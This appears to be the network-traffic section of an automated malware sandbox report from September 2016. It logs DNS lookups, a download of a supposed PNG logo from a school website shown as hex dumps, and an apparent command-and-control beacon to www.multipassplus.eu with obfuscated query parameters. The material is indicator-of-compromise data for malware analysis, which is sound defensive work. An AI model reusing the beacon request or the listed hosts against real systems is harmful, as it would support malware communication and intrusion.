Sep 7, 2016 12:48:25.252137899 CEST	192.168.1.22	8.8.8.8	0xd841	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:27.251607895 CEST	192.168.1.22	8.8.8.8	0xd841	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:28.820525885 CEST	192.168.1.22	8.8.8.8	0x63fe	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
Sep 7, 2016 12:49:34.678656101 CEST	192.168.1.22	8.8.8.8	0x61fb	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
Sep 7, 2016 12:49:35.574203014 CEST	192.168.1.22	8.8.8.8	0xd2b6	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Sep 7, 2016 12:46:49.952840090 CEST	8.8.8.8	192.168.1.22	0xb2d4	No error (0)	www.diefenbachgymnasium.at	176.9.16.213	A (IP address)	IN (0x0001)
Sep 7, 2016 12:46:50.554362059 CEST	8.8.8.8	192.168.1.22	0x7f9a	No error (0)	www.diefenbachgymnasium.at	176.9.16.213	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:28.801621914 CEST	8.8.8.8	192.168.1.22	0xd841	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:28.801681042 CEST	8.8.8.8	192.168.1.22	0xd841	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:28.801707983 CEST	8.8.8.8	192.168.1.22	0xd841	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:28.801733017 CEST	8.8.8.8	192.168.1.22	0xd841	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:29.553364038 CEST	8.8.8.8	192.168.1.22	0x63fe	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:49:35.560075045 CEST	8.8.8.8	192.168.1.22	0x61fb	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)
Sep 7, 2016 12:49:36.557745934 CEST	8.8.8.8	192.168.1.22	0xd2b6	No error (0)	www.multipassplus.eu	85.90.53.159	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.diefenbachgymnasium.at

www.multipassplus.eu

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Sep 7, 2016 12:46:50.558581114 CEST	49206	80	192.168.1.22	176.9.16.213	GET /sites/all/themes/diefenbach/small_logo.png HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Host: www.diefenbachgymnasium.at	87
Sep 7, 2016 12:46:51.622020960 CEST	80	49206	176.9.16.213	192.168.1.22	HTTP/1.1 200 OK Date: Wed, 07 Sep 2016 10:46:51 GMT Server: Apache Last-Modified: Thu, 25 Aug 2016 12:42:41 GMT ETag: "2e54caf-3ceb9-53ae4bbc8b240" Accept-Ranges: bytes Content-Length: 249529 X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 Connection: close Content-Type: image/png Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 eb 00 00 00 4a 08 06 00 00 00 5a 4a a3 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 dc 08 09 0f 16 0a 13 41 69 4b 00 00 00 19 74 45 58 74 43 6f 6d 6d 65 6e 74 00 43 72 65 61 74 65 64 20 77 69 74 68 20 47 49 4d 50 57 81 0e 17 00 03 94 00 74 49 48 47 4c 66 4d ed 5a 21 15 71 01 9d fb ea 35 8e 08 67 b2 78 27 95 55 99 f3 40 64 c3 Data Ascii: PNGIHDRJZJsRGBbKGDpHYstIMEAiKtEXtCommentCreated with GIMPWtIHGLfMZ!q5gx'U@d	88
Sep 7, 2016 12:46:51.622703075 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: e3 72 ea 58 6a 7c 2b cd ae 6c aa cb 2a c7 f5 d3 c7 de 18 e3 00 3c 4a 9d 6a 5b c1 40 24 d2 2e 2e 78 a9 fa e0 2e e4 8d 38 76 6b c9 24 c8 1c 00 d1 20 17 5f 7c 1f 71 e1 84 0d 91 59 ea bf 98 18 a5 ae 42 08 19 c8 10 59 ac a5 ed 66 f4 32 83 c1 46 82 e4 Data Ascii: rXj\|+l*<Jj[@$..x.8vk$ _\|qYBYf2F\|#j`i},c^ncHC6u4+P`>Ysbj't8s\M}k,zl5ohvZ;CR<v.RKbogx}6@](Y&y	89
Sep 7, 2016 12:46:51.622725010 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: fe 33 83 6a 1a cd a6 13 d9 5b fd 77 c5 c3 8a 79 d3 f6 f4 8f 24 aa e3 b0 cf 0b d5 d7 97 60 11 81 e6 7c 8a bc 72 d2 89 3c ad a0 22 33 2c 1c e9 23 61 f0 54 e9 44 7b fc 18 35 d9 02 83 11 c6 df ed c6 5c 58 65 42 6f 0d 2b 7a 07 a3 04 d1 66 39 ee 36 a1 Data Ascii: 3j[wy$`\|r<"3,#aTD{5\XeBo+zf96L1gg[`v$Hii(Z(C"o.#KLFKBfBy0qFn%)vh]zJUQ(.b8J+#c]gD+tFSHE R	91
Sep 7, 2016 12:46:51.622890949 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: dc ad e1 40 8c 71 e1 d2 f4 5e 5e 5e db 20 a3 71 59 52 50 d8 12 95 23 2c 93 82 db 3d e9 7a 0a 53 ea 84 72 34 10 49 ee f6 f4 89 b2 84 8e 4d b6 6a 03 52 b8 74 92 46 3c d6 94 d7 a2 c8 b9 cd 43 d0 07 47 7a 92 83 b1 64 67 c7 43 34 37 15 bb 44 64 9e 80 Data Ascii: @q^^^ qYRP#,=zSr4IMjRtF<CGzdgC47DdeejAv.wo'#mRR9iZ{w2a![QF~w>tZ/&E:7kCf$R8q%9m0<uQTX2,Tg@[\o$$lxXNTE	91
Sep 7, 2016 12:46:51.631259918 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: e0 b4 e6 a8 fc 44 6d 86 0e c1 4b 2c ac 39 ee 08 c3 98 3c ea 0e da dc e8 c5 44 ad bf 52 4d f2 d1 1e 51 59 fb c0 ff ec 2c 22 ef 69 ec 52 6e 36 c0 4d e3 d5 3a 3a f5 a1 65 a4 d2 1c 5c 5b 87 ae fd b4 7b 2c df 9c 9a cc 11 08 a5 11 33 ec 5c f5 22 f0 6f Data Ascii: DmK,9<DRMQY,"iRn6M::e\[{,3\"o:`>;CBw(RVMl-cHt2*3wR'a'c#O}t'+i,(;>~!Lc67eR[Z>t>2T2W( rVz>dAU05	93
Sep 7, 2016 12:46:51.631280899 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: 07 53 4b f9 7a fb 12 60 eb 64 f8 50 b4 2d 55 bc 76 4c fd 8d ec 40 6b 04 ce 56 7d 7b 3e 12 20 55 93 31 24 d6 d1 fd ba be 39 35 6b a6 43 54 be 87 8c f7 33 83 69 15 b5 d0 ab e5 6e 58 14 a7 3e a1 dc 02 27 bc a5 e6 e9 38 0b fd 47 8b fe d6 06 b3 d3 bf Data Ascii: SKz`dP-UvL@kV}{> U1$95kCT3inX>'8G``z^c4+3h Fv4L#TK?v}y/TNMhJLP\9ZdY-wQx~;Yawk`nmdkFD\| &i=hnl&+Ze/a	94
Sep 7, 2016 12:46:51.631541014 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: 2a c3 be 1f 21 62 17 8b 76 06 7d f7 81 64 74 2a 1e 80 76 c1 d1 2b 78 93 a3 95 11 f2 36 d6 52 d9 0a 79 ba e8 9e 9b 0a 21 98 d3 ea 9d a0 92 db e3 53 ba ef f9 a7 6e 36 55 c6 18 f9 ea 68 a4 2e b1 3d 57 95 97 ed c0 42 bc de 35 dd fe b5 75 45 32 b0 fb Data Ascii: !bv}dtv+x6Ry!Sn6Uh.=WB5uE290`s=)fPwQ6&&7KB([Z~-xLTW)]{M`M/%YGRkH]qfvAv-7I)`-FMQ(./0m(K(b	95
Sep 7, 2016 12:46:51.633363962 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: 71 2f 49 70 49 d8 a8 16 2e 86 56 69 be f8 7b 0d 8f 66 b2 51 35 31 1a 21 f3 f6 86 32 cf b5 7c 59 47 af ba b2 62 4d ff b8 36 d5 22 e3 3b d4 1e 8b 31 24 fb fc 45 32 8a 36 66 1d 1c c6 a0 8d 3a 7f fb 4b 2a ad 2e e1 17 4f 7d 05 a7 01 f7 04 1f 10 aa 6e Data Ascii: q/IpI.Vi{fQ51!2\|YGbM6";1$E26f:K*.O}n1#x1/B7,R$UE&uottXG6h{A9TQ>!]oJKQ%xJ1F@0%y}_=;]^a{sCC -JTu-~	96
Sep 7, 2016 12:46:51.633387089 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: 78 ab 73 22 97 98 da 3a 00 d2 91 f1 77 7d 4f ee fd 37 71 9e af a8 d7 e8 8a ea 8b 6e 7c 92 a1 7a 76 50 22 61 ba ae 67 22 54 09 5b 32 c7 4d f2 ed 30 07 45 1f 99 11 88 c5 09 50 4b 3f 8c c1 9e c9 85 ee bc d8 22 fa 93 17 e1 e6 b1 f6 99 a2 d0 4f 28 12 Data Ascii: xs":w}O7qn\|zvP"ag"T[2M0EPK?"O(?\|Eo9%A^~36mGFWn6ctf0VNc>=R\nv\|dq5;2l<hJj?sYanA@	98
Sep 7, 2016 12:46:51.633609056 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: 91 30 b1 5a 06 6a f7 42 3f e6 96 30 2e 7b f4 84 39 ca 07 8e f2 57 03 62 48 bc 62 b9 01 f2 53 5c 43 e0 3e d7 90 98 39 fc 5a e8 45 6c 0d fd c6 de 9b 07 1f 87 bf 5a 5b 79 54 00 31 a9 90 0d af 79 4a c6 c7 fc 09 79 01 8f 8b 3b a6 4c dd 9b e5 51 a9 2f Data Ascii: 0ZjB?0.{9WbHbS\C>9ZElZ[yT1yJy;LQ/vTM~=_Sg&0l2O}m=M1Xp09B*SF7Z^^]`CJw)8j+Tx.S7>#_ 3>%ivBK:@gf	99
Sep 7, 2016 12:46:51.644187927 CEST	80	49206	176.9.16.213	192.168.1.22	Data Raw: aa 55 e3 73 32 ef 01 7d b1 a1 ca 7e 36 07 a4 71 66 d9 52 7d 70 80 19 91 cb f3 fa ae 50 b5 9d 91 90 80 06 0e 02 03 bb d2 6b 6d 48 d3 9f cd 0a 88 bd c8 0f ca c5 a4 62 08 9a af 17 ca bc a3 54 b8 42 f1 71 58 b2 4d ed 56 9b 7f 84 1f 65 27 3e 13 60 e7 Data Ascii: Us2}~6qfR}pPkmHbTBqXMVe'>`ioJIY+HR4)gC/sVgwNgzQe@A&oMhPq>\L3>XECq*/&%?\{<~Mlpx.QA9o5<vTeC&	100
Sep 7, 2016 12:46:51.644222975 CEST	80	49206	176.9.16.213	192.168.1.22		102
Sep 7, 2016 12:46:51.644234896 CEST	80	49206	176.9.16.213	192.168.1.22		103
Sep 7, 2016 12:46:51.644438982 CEST	80	49206	176.9.16.213	192.168.1.22		104
Sep 7, 2016 12:46:51.644572973 CEST	80	49206	176.9.16.213	192.168.1.22		106
Sep 7, 2016 12:46:51.644589901 CEST	80	49206	176.9.16.213	192.168.1.22		107
Sep 7, 2016 12:46:51.644717932 CEST	80	49206	176.9.16.213	192.168.1.22		109
Sep 7, 2016 12:46:51.644732952 CEST	80	49206	176.9.16.213	192.168.1.22		110
Sep 7, 2016 12:46:51.644747019 CEST	80	49206	176.9.16.213	192.168.1.22		111
Sep 7, 2016 12:46:51.649797916 CEST	80	49206	176.9.16.213	192.168.1.22		113
Sep 7, 2016 12:46:51.649820089 CEST	80	49206	176.9.16.213	192.168.1.22		114
Sep 7, 2016 12:46:51.649832010 CEST	80	49206	176.9.16.213	192.168.1.22		115
Sep 7, 2016 12:46:51.650046110 CEST	80	49206	176.9.16.213	192.168.1.22		116
Sep 7, 2016 12:46:51.655255079 CEST	80	49206	176.9.16.213	192.168.1.22		117
Sep 7, 2016 12:46:51.655277967 CEST	80	49206	176.9.16.213	192.168.1.22		119
Sep 7, 2016 12:46:51.655406952 CEST	80	49206	176.9.16.213	192.168.1.22		120
Sep 7, 2016 12:46:51.655422926 CEST	80	49206	176.9.16.213	192.168.1.22		122
Sep 7, 2016 12:46:51.655447006 CEST	80	49206	176.9.16.213	192.168.1.22		123
Sep 7, 2016 12:46:51.655463934 CEST	80	49206	176.9.16.213	192.168.1.22		124
Sep 7, 2016 12:46:51.658982038 CEST	80	49206	176.9.16.213	192.168.1.22		126
Sep 7, 2016 12:46:51.659025908 CEST	80	49206	176.9.16.213	192.168.1.22		127
Sep 7, 2016 12:46:51.659037113 CEST	80	49206	176.9.16.213	192.168.1.22		128
Sep 7, 2016 12:46:51.665725946 CEST	80	49206	176.9.16.213	192.168.1.22		129
Sep 7, 2016 12:46:51.665749073 CEST	80	49206	176.9.16.213	192.168.1.22		131
Sep 7, 2016 12:46:51.665756941 CEST	80	49206	176.9.16.213	192.168.1.22		132
Sep 7, 2016 12:46:51.666286945 CEST	80	49206	176.9.16.213	192.168.1.22		132
Sep 7, 2016 12:46:51.666570902 CEST	80	49206	176.9.16.213	192.168.1.22		134
Sep 7, 2016 12:46:51.666588068 CEST	80	49206	176.9.16.213	192.168.1.22		135
Sep 7, 2016 12:46:51.666765928 CEST	80	49206	176.9.16.213	192.168.1.22		136
Sep 7, 2016 12:46:51.667668104 CEST	80	49206	176.9.16.213	192.168.1.22		137
Sep 7, 2016 12:46:51.667690992 CEST	80	49206	176.9.16.213	192.168.1.22		139
Sep 7, 2016 12:46:51.667705059 CEST	80	49206	176.9.16.213	192.168.1.22		140
Sep 7, 2016 12:46:51.667860031 CEST	80	49206	176.9.16.213	192.168.1.22		141
Sep 7, 2016 12:46:51.667983055 CEST	80	49206	176.9.16.213	192.168.1.22		142
Sep 7, 2016 12:46:51.667999983 CEST	80	49206	176.9.16.213	192.168.1.22		144
Sep 7, 2016 12:46:51.668124914 CEST	80	49206	176.9.16.213	192.168.1.22		144
Sep 7, 2016 12:46:51.669154882 CEST	80	49206	176.9.16.213	192.168.1.22		146
Sep 7, 2016 12:46:51.669177055 CEST	80	49206	176.9.16.213	192.168.1.22		147
Sep 7, 2016 12:46:51.669224024 CEST	80	49206	176.9.16.213	192.168.1.22		149
Sep 7, 2016 12:46:51.669403076 CEST	80	49206	176.9.16.213	192.168.1.22		149
Sep 7, 2016 12:46:51.681157112 CEST	80	49206	176.9.16.213	192.168.1.22		150
Sep 7, 2016 12:46:51.681179047 CEST	80	49206	176.9.16.213	192.168.1.22		152
Sep 7, 2016 12:46:51.681423903 CEST	80	49206	176.9.16.213	192.168.1.22		152
Sep 7, 2016 12:46:51.682431936 CEST	80	49206	176.9.16.213	192.168.1.22		154
Sep 7, 2016 12:46:51.682449102 CEST	80	49206	176.9.16.213	192.168.1.22		155
Sep 7, 2016 12:46:51.682461023 CEST	80	49206	176.9.16.213	192.168.1.22		157
Sep 7, 2016 12:46:51.682677031 CEST	80	49206	176.9.16.213	192.168.1.22		157
Sep 7, 2016 12:46:51.688311100 CEST	80	49206	176.9.16.213	192.168.1.22		159
Sep 7, 2016 12:46:51.688327074 CEST	80	49206	176.9.16.213	192.168.1.22		160
Sep 7, 2016 12:46:51.688560963 CEST	80	49206	176.9.16.213	192.168.1.22		161
Sep 7, 2016 12:46:51.691612959 CEST	80	49206	176.9.16.213	192.168.1.22		162
Sep 7, 2016 12:46:51.691634893 CEST	80	49206	176.9.16.213	192.168.1.22		164
Sep 7, 2016 12:46:51.691831112 CEST	80	49206	176.9.16.213	192.168.1.22		165
Sep 7, 2016 12:46:51.696264029 CEST	80	49206	176.9.16.213	192.168.1.22		166
Sep 7, 2016 12:46:51.696285963 CEST	80	49206	176.9.16.213	192.168.1.22		168
Sep 7, 2016 12:46:51.696533918 CEST	80	49206	176.9.16.213	192.168.1.22		169
Sep 7, 2016 12:46:51.696751118 CEST	80	49206	176.9.16.213	192.168.1.22		170
Sep 7, 2016 12:46:51.696769953 CEST	80	49206	176.9.16.213	192.168.1.22		172
Sep 7, 2016 12:46:51.696778059 CEST	80	49206	176.9.16.213	192.168.1.22		173
Sep 7, 2016 12:46:51.696906090 CEST	80	49206	176.9.16.213	192.168.1.22		174
Sep 7, 2016 12:46:51.701015949 CEST	80	49206	176.9.16.213	192.168.1.22		175
Sep 7, 2016 12:46:51.701036930 CEST	80	49206	176.9.16.213	192.168.1.22		177
Sep 7, 2016 12:46:51.701271057 CEST	80	49206	176.9.16.213	192.168.1.22		177
Sep 7, 2016 12:46:51.708168030 CEST	80	49206	176.9.16.213	192.168.1.22		179
Sep 7, 2016 12:46:51.708189964 CEST	80	49206	176.9.16.213	192.168.1.22		180
Sep 7, 2016 12:46:51.708386898 CEST	80	49206	176.9.16.213	192.168.1.22		181
Sep 7, 2016 12:46:51.711541891 CEST	80	49206	176.9.16.213	192.168.1.22		183
Sep 7, 2016 12:46:51.711563110 CEST	80	49206	176.9.16.213	192.168.1.22		184
Sep 7, 2016 12:46:51.711793900 CEST	80	49206	176.9.16.213	192.168.1.22		185
Sep 7, 2016 12:46:51.711908102 CEST	80	49206	176.9.16.213	192.168.1.22		187
Sep 7, 2016 12:46:51.711926937 CEST	80	49206	176.9.16.213	192.168.1.22		188
Sep 7, 2016 12:46:51.712081909 CEST	80	49206	176.9.16.213	192.168.1.22		190
Sep 7, 2016 12:46:51.717297077 CEST	80	49206	176.9.16.213	192.168.1.22		191
Sep 7, 2016 12:46:51.717319012 CEST	80	49206	176.9.16.213	192.168.1.22		192
Sep 7, 2016 12:46:51.717550039 CEST	80	49206	176.9.16.213	192.168.1.22		194
Sep 7, 2016 12:46:51.747659922 CEST	80	49206	176.9.16.213	192.168.1.22		195
Sep 7, 2016 12:46:51.747685909 CEST	80	49206	176.9.16.213	192.168.1.22		197
Sep 7, 2016 12:46:51.747838020 CEST	80	49206	176.9.16.213	192.168.1.22		198
Sep 7, 2016 12:46:51.747858047 CEST	80	49206	176.9.16.213	192.168.1.22		200
Sep 7, 2016 12:46:51.747869015 CEST	80	49206	176.9.16.213	192.168.1.22		201
Sep 7, 2016 12:46:51.747890949 CEST	80	49206	176.9.16.213	192.168.1.22		202
Sep 7, 2016 12:46:51.748034000 CEST	80	49206	176.9.16.213	192.168.1.22		203
Sep 7, 2016 12:46:51.748054981 CEST	80	49206	176.9.16.213	192.168.1.22		205
Sep 7, 2016 12:46:51.748064995 CEST	80	49206	176.9.16.213	192.168.1.22		206
Sep 7, 2016 12:46:51.748253107 CEST	80	49206	176.9.16.213	192.168.1.22		206
Sep 7, 2016 12:46:51.847417116 CEST	80	49206	176.9.16.213	192.168.1.22		208
Sep 7, 2016 12:46:51.847443104 CEST	80	49206	176.9.16.213	192.168.1.22		209
Sep 7, 2016 12:46:51.847459078 CEST	80	49206	176.9.16.213	192.168.1.22		211
Sep 7, 2016 12:46:51.847470045 CEST	80	49206	176.9.16.213	192.168.1.22		212
Sep 7, 2016 12:46:51.847599983 CEST	80	49206	176.9.16.213	192.168.1.22		214
Sep 7, 2016 12:46:51.847690105 CEST	80	49206	176.9.16.213	192.168.1.22		215
Sep 7, 2016 12:46:51.847786903 CEST	80	49206	176.9.16.213	192.168.1.22		216
Sep 7, 2016 12:46:51.847807884 CEST	80	49206	176.9.16.213	192.168.1.22		218
Sep 7, 2016 12:46:51.847968102 CEST	80	49206	176.9.16.213	192.168.1.22		218
Sep 7, 2016 12:46:51.947204113 CEST	80	49206	176.9.16.213	192.168.1.22		220
Sep 7, 2016 12:46:51.947231054 CEST	80	49206	176.9.16.213	192.168.1.22		221
Sep 7, 2016 12:46:51.947249889 CEST	80	49206	176.9.16.213	192.168.1.22		223
Sep 7, 2016 12:46:51.947266102 CEST	80	49206	176.9.16.213	192.168.1.22		224
Sep 7, 2016 12:46:51.947277069 CEST	80	49206	176.9.16.213	192.168.1.22		226
Sep 7, 2016 12:46:51.947494984 CEST	80	49206	176.9.16.213	192.168.1.22		226
Sep 7, 2016 12:46:52.047605991 CEST	80	49206	176.9.16.213	192.168.1.22		228
Sep 7, 2016 12:46:52.047632933 CEST	80	49206	176.9.16.213	192.168.1.22		229
Sep 7, 2016 12:46:52.047818899 CEST	80	49206	176.9.16.213	192.168.1.22		231
Sep 7, 2016 12:46:52.047838926 CEST	80	49206	176.9.16.213	192.168.1.22		232
Sep 7, 2016 12:46:52.047854900 CEST	80	49206	176.9.16.213	192.168.1.22		234
Sep 7, 2016 12:46:52.047875881 CEST	80	49206	176.9.16.213	192.168.1.22		234
Sep 7, 2016 12:46:52.147242069 CEST	80	49206	176.9.16.213	192.168.1.22		236
Sep 7, 2016 12:46:52.147447109 CEST	80	49206	176.9.16.213	192.168.1.22		237
Sep 7, 2016 12:46:52.147468090 CEST	80	49206	176.9.16.213	192.168.1.22		239
Sep 7, 2016 12:46:52.147485971 CEST	80	49206	176.9.16.213	192.168.1.22		240
Sep 7, 2016 12:46:52.147500992 CEST	80	49206	176.9.16.213	192.168.1.22		241
Sep 7, 2016 12:46:52.147636890 CEST	80	49206	176.9.16.213	192.168.1.22		243
Sep 7, 2016 12:46:52.147722006 CEST	80	49206	176.9.16.213	192.168.1.22		244
Sep 7, 2016 12:46:52.147739887 CEST	80	49206	176.9.16.213	192.168.1.22		246
Sep 7, 2016 12:46:52.147821903 CEST	80	49206	176.9.16.213	192.168.1.22		246
Sep 7, 2016 12:46:52.247095108 CEST	80	49206	176.9.16.213	192.168.1.22		248
Sep 7, 2016 12:46:52.247117043 CEST	80	49206	176.9.16.213	192.168.1.22		249
Sep 7, 2016 12:46:52.247127056 CEST	80	49206	176.9.16.213	192.168.1.22		251
Sep 7, 2016 12:46:52.247214079 CEST	80	49206	176.9.16.213	192.168.1.22		251
Sep 7, 2016 12:46:52.247296095 CEST	80	49206	176.9.16.213	192.168.1.22		253
Sep 7, 2016 12:46:52.247304916 CEST	80	49206	176.9.16.213	192.168.1.22		254
Sep 7, 2016 12:46:52.247395039 CEST	80	49206	176.9.16.213	192.168.1.22		256
Sep 7, 2016 12:46:52.347630024 CEST	80	49206	176.9.16.213	192.168.1.22		257
Sep 7, 2016 12:46:52.347652912 CEST	80	49206	176.9.16.213	192.168.1.22		259
Sep 7, 2016 12:46:52.347660065 CEST	80	49206	176.9.16.213	192.168.1.22		260
Sep 7, 2016 12:46:52.347665071 CEST	80	49206	176.9.16.213	192.168.1.22		261
Sep 7, 2016 12:46:52.347702026 CEST	80	49206	176.9.16.213	192.168.1.22		263
Sep 7, 2016 12:46:52.347798109 CEST	80	49206	176.9.16.213	192.168.1.22		264
Sep 7, 2016 12:46:52.347810030 CEST	80	49206	176.9.16.213	192.168.1.22		266
Sep 7, 2016 12:46:52.347879887 CEST	80	49206	176.9.16.213	192.168.1.22		267
Sep 7, 2016 12:46:52.447092056 CEST	80	49206	176.9.16.213	192.168.1.22		268
Sep 7, 2016 12:46:52.447256088 CEST	80	49206	176.9.16.213	192.168.1.22		270
Sep 7, 2016 12:46:52.447273016 CEST	80	49206	176.9.16.213	192.168.1.22		271
Sep 7, 2016 12:46:52.447288990 CEST	80	49206	176.9.16.213	192.168.1.22		273
Sep 7, 2016 12:46:52.447308064 CEST	80	49206	176.9.16.213	192.168.1.22		274
Sep 7, 2016 12:46:52.447432995 CEST	80	49206	176.9.16.213	192.168.1.22		275
Sep 7, 2016 12:46:52.547621012 CEST	80	49206	176.9.16.213	192.168.1.22		277
Sep 7, 2016 12:46:52.547642946 CEST	80	49206	176.9.16.213	192.168.1.22		278
Sep 7, 2016 12:46:52.547759056 CEST	80	49206	176.9.16.213	192.168.1.22		280
Sep 7, 2016 12:46:52.547774076 CEST	80	49206	176.9.16.213	192.168.1.22		281
Sep 7, 2016 12:46:52.547781944 CEST	80	49206	176.9.16.213	192.168.1.22		283
Sep 7, 2016 12:46:52.547914028 CEST	80	49206	176.9.16.213	192.168.1.22		284
Sep 7, 2016 12:46:52.647187948 CEST	80	49206	176.9.16.213	192.168.1.22		285
Sep 7, 2016 12:46:52.647209883 CEST	80	49206	176.9.16.213	192.168.1.22		287
Sep 7, 2016 12:46:52.647218943 CEST	80	49206	176.9.16.213	192.168.1.22		288
Sep 7, 2016 12:46:52.647228956 CEST	80	49206	176.9.16.213	192.168.1.22		289
Sep 7, 2016 12:46:52.647237062 CEST	80	49206	176.9.16.213	192.168.1.22		291
Sep 7, 2016 12:46:52.647361994 CEST	80	49206	176.9.16.213	192.168.1.22		292
Sep 7, 2016 12:46:52.647377014 CEST	80	49206	176.9.16.213	192.168.1.22		294
Sep 7, 2016 12:46:52.647412062 CEST	80	49206	176.9.16.213	192.168.1.22		295
Sep 7, 2016 12:46:52.747642994 CEST	80	49206	176.9.16.213	192.168.1.22		296
Sep 7, 2016 12:46:52.747762918 CEST	80	49206	176.9.16.213	192.168.1.22		298
Sep 7, 2016 12:46:52.747778893 CEST	80	49206	176.9.16.213	192.168.1.22		299
Sep 7, 2016 12:46:52.747867107 CEST	80	49206	176.9.16.213	192.168.1.22		301
Sep 7, 2016 12:46:52.747880936 CEST	80	49206	176.9.16.213	192.168.1.22		302
Sep 7, 2016 12:46:52.747889042 CEST	80	49206	176.9.16.213	192.168.1.22		304
Sep 7, 2016 12:46:52.747920036 CEST	80	49206	176.9.16.213	192.168.1.22		304
Sep 7, 2016 12:46:52.847249031 CEST	80	49206	176.9.16.213	192.168.1.22		306
Sep 7, 2016 12:46:52.847276926 CEST	80	49206	176.9.16.213	192.168.1.22		307
Sep 7, 2016 12:46:52.847286940 CEST	80	49206	176.9.16.213	192.168.1.22		308
Sep 7, 2016 12:46:52.847387075 CEST	80	49206	176.9.16.213	192.168.1.22		310
Sep 7, 2016 12:46:52.847403049 CEST	80	49206	176.9.16.213	192.168.1.22		311
Sep 7, 2016 12:46:52.847455978 CEST	80	49206	176.9.16.213	192.168.1.22		312
Sep 7, 2016 12:46:52.847501993 CEST	80	49206	176.9.16.213	192.168.1.22		314
Sep 7, 2016 12:46:52.847515106 CEST	80	49206	176.9.16.213	192.168.1.22		315
Sep 7, 2016 12:46:52.847660065 CEST	80	49206	176.9.16.213	192.168.1.22		316
Sep 7, 2016 12:46:52.947936058 CEST	80	49206	176.9.16.213	192.168.1.22		317
Sep 7, 2016 12:46:52.947964907 CEST	80	49206	176.9.16.213	192.168.1.22		319
Sep 7, 2016 12:46:52.947979927 CEST	80	49206	176.9.16.213	192.168.1.22		320
Sep 7, 2016 12:46:52.947995901 CEST	80	49206	176.9.16.213	192.168.1.22		322
Sep 7, 2016 12:46:52.948025942 CEST	80	49206	176.9.16.213	192.168.1.22		323
Sep 7, 2016 12:46:52.948143005 CEST	80	49206	176.9.16.213	192.168.1.22		324
Sep 7, 2016 12:46:53.047274113 CEST	80	49206	176.9.16.213	192.168.1.22		325
Sep 7, 2016 12:46:53.047298908 CEST	80	49206	176.9.16.213	192.168.1.22		327
Sep 7, 2016 12:46:53.047355890 CEST	80	49206	176.9.16.213	192.168.1.22		328
Sep 7, 2016 12:46:53.047478914 CEST	80	49206	176.9.16.213	192.168.1.22		330
Sep 7, 2016 12:46:53.047493935 CEST	80	49206	176.9.16.213	192.168.1.22		331
Sep 7, 2016 12:46:53.047558069 CEST	80	49206	176.9.16.213	192.168.1.22		333
Sep 7, 2016 12:46:53.146912098 CEST	80	49206	176.9.16.213	192.168.1.22		334
Sep 7, 2016 12:46:53.147125006 CEST	80	49206	176.9.16.213	192.168.1.22		335
Sep 7, 2016 12:46:53.147142887 CEST	80	49206	176.9.16.213	192.168.1.22		337
Sep 7, 2016 12:46:53.147156954 CEST	80	49206	176.9.16.213	192.168.1.22		338
Sep 7, 2016 12:46:53.147166967 CEST	80	49206	176.9.16.213	192.168.1.22		340
Sep 7, 2016 12:46:53.147296906 CEST	80	49206	176.9.16.213	192.168.1.22		341
Sep 7, 2016 12:46:53.147313118 CEST	80	49206	176.9.16.213	192.168.1.22		343
Sep 7, 2016 12:46:53.147325039 CEST	80	49206	176.9.16.213	192.168.1.22		344
Sep 7, 2016 12:46:53.147361994 CEST	80	49206	176.9.16.213	192.168.1.22		344

HTTPS Proxied Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header / Data
2016-09-07 10:48:31 UTC	49207	443	192.168.1.22	85.90.53.159	GET /includes/search/?password=0SOCGHJLpGg&done=y&fail=19UUQb&category=Oruw&name=qY&email=%2BOT91&q=FPt32HbS%2F&url=4pP&psw=xT&lang=fG83ZMW%2Fa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Host: www.multipassplus.eu
2016-09-07 10:49:31 UTC	443	49207	85.90.53.159	192.168.1.22	HTTP/1.1 504 Gateway Time-out Server: nginx/1.0.15 Date: Wed, 07 Sep 2016 10:49:31 GMT Content-Type: text/html Content-Length: 585 Connection: close
